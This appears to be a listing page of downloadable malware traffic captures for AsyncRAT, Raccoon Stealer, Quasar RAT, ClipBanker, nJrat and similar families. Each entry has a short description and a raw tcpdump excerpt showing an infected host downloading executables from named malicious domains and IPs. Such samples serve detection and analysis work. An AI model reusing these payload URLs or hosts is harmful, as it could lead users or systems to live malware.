AsyncRAT RacoonStealer tunnabelly.ug jamshed.pk vbchjfssdfcxbcver.ru thompson.ug PCAP Traffic Sample File Download

2020-06-23 15:26:21.518710 IP 10.1.10.15.49742 > 217.8.117.45.80: Flags [P.], seq 1:502, ack 1, win 16425, length 501: HTTP: GET /zxcv.EXE HTTP/1.1 E….=@…wX . …u-.N.P’&”i….P.@).Q..GET /zxcv.EXE HTTP/1.1 Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */* Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Range: bytes=90210- Unless-Modified-Since: Sat, 20 Jun 2020 15:23:12 GMT If-Range: “177000-5a8859680d070” Host: jamshed.pk Connection: Keep-Alive 2020-06-23 15:26:21.594726 IP 10.1.10.15.49724 > 64.31.23.18.80: Flags [.], ack 50, win 16363, length 0 E..(.>@…pQ . .@….<.P..fx..c.P.?……….. 2020-06-23 15:26:21.673543 IP 217.8.117.45.80 > 10.1.10.15.49742: Flags [.], ack 502, win […]

AZORult RacoonStealer Banking Malware Crypto miner PCAP File Download Traffic Sample

AZORult/RacoonStealer can steal banking information including passwords and credit card details as well as cryptocurrency. This constantly updated information stealer malware should not be taken lightly, as it continues to be an active threat. Raccoon is an info stealer type malware available as a Malware as a Service. It can be obtained for a subscription and costs $200 per month. Raccoon malware has already infected over 100,000 devices and became one of the most mentioned viruses on the underground forums in 2019.  TypeStealer  Originex-USSR Raccoon malware comes with fairly basic info stealer functions and by itself lacks any kind of […]

Quasar RAT ClipBanker Banking Trojan Malware PCAP File Download Traffic Sample

Quasar is a very popular RAT in the world thanks to its code being available in the open-source. This malware can be used to remotely control the victim’s computer. 4.exe is the dropper for the banking trojan and Quasar is the GET /line ip-api.com traffic. TrojanBanker:Win32/ClipBanker.777af9cd Trojan[Banker]/Win32.ClipBanker . .T&.h.c.P.J.\V.4.P.@)N……… 2020-06-23 14:29:07.371643 IP 10.1.10.15.49763 > 84.38.180.104.80: Flags [P.], seq 1:513, ack 1, win 16425, length 512: HTTP: GET /downfiles/4.exe HTTP/1.1 E..(..@….R . .T&.h.c.P.J.\V.4.P.@)….GET /downfiles/4.exe HTTP/1.1 Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */* Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET […]

APT 5 Syrian Iranian Malware RAT nJrat, Netwire NanoCore, DarkKomet, Babylon Traffic Sample PCAP file Download 141.255.152.104

020-06-03 06:14:07.168233 IP 10.1.10.15.49510 > 191.234.186.189.80: Flags [P.], seq 1:432, ack 1, win 16560, length 431: HTTP: GET /kkkkkkk/ HTTP/1.1 E…..@…P. . ……f.P\.m…a.P.@.f}..GET /kkkkkkk/ HTTP/1.1 Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */* Referer: http://191.234.186.189/ Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: 191.234.186.189 Connection: Keep-Alive 2020-06-03 06:14:07.315098 IP 191.234.186.189.80 > 10.1.10.15.49510: Flags [P.], seq 1:1222, ack 432, win 513, length 1221: HTTP: HTTP/1.1 200 OK E…Y6@.m.!….. . ..P.f..a.\.o.P…….HTTP/1.1 200 OK Date: Wed, 03 Jun 2020 10:16:23 GMT Server: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.2.29 […]